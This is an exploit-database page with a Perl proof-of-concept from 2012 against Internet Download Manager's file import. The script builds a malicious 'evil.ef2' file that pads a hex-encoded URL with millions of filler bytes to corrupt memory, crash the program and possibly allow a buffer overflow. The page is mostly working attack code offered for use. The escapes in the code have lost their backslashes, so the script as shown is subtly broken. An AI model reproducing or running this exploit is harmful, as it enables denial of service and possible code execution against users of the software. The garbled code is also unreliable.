Internet Download Manager All Versions Memory Corruption Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Internet Download Manager All Versions Memory Corruption Vulnerability
# Published : 2012-08-31
# Author :
# Previous Title : AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution
# Next Title : Oxide Webserver 2.0.4 Denial of Service Vulnerability

#!/usr/bin/perl
# 1               ==========================================               1
# 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                              White Hat                                 1
# 0                         Independant Pentester                          0
# 1                      exploit coder/bug researcher                      0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title  : Internet Download Manager All Versions - Memory Corruption Vulnerability .
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : Local 
# Risk   : Critical
# Vendor : Tonec Inc.
# Versions : All versions supporting the IDM file importation are Vulnerable .
# Tested On : Windows XP Service Pack 2 FR 32-bits , Windows 7 FR 64-bits
# Date : 31 August 2012
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...

#Vulnerability Details : Work your skills & imagination .


#Usage   : Copy this script to memorycorruption.pl
#Execute : perl memorycorruption.pl

#Howto : Go to Tasks ---> Import ---> From IDM export file ---> evil.ef2  (executing file as .eif may also work )
#              Taches --> Importer -> Depuis un fichier IDM ---> evil.ef2


my $hd = "x3cn";
my $ed = "x3en";
my $ht = "x68x74x74x70x3ax2fx2f";
my $lk = "x77x77x77x2ex31x33x33x37x64x61x79x2ex63x6fx6dx2fx65x78x70x6cx6fx69x74x73x2fx31x39x32x31x31n";
my $fake ="x2ex63x6fx6dx2fx64x61x72x6bx70x75x7ax7ax6cx65x2ex74x78x74n";
my $txt = "x41" x 2000000;
my $stx = "x42" x 400000 ;
my $null = "x00x00"; # Not Necessary , but maybe more effective .

# Sorry Script Kiddies ...
# BOF is possible and every failed attempt will cause a Denial of Service Vulnerability .

my $file = "evil.ef2";

open ($File, ">$file");
print $File $hd.$ht.$lk.$ed.$hd.$ht.$txt.$stx.$fake.$ed;
close ($File);
print " Exploit By Dark-Puzzle n" ;
print " Creating Evil File , Please Wait ...nnn";
sleep (5);
print " Evil File Created Successfully , Happy Hunting :)n";

# Datasec Team .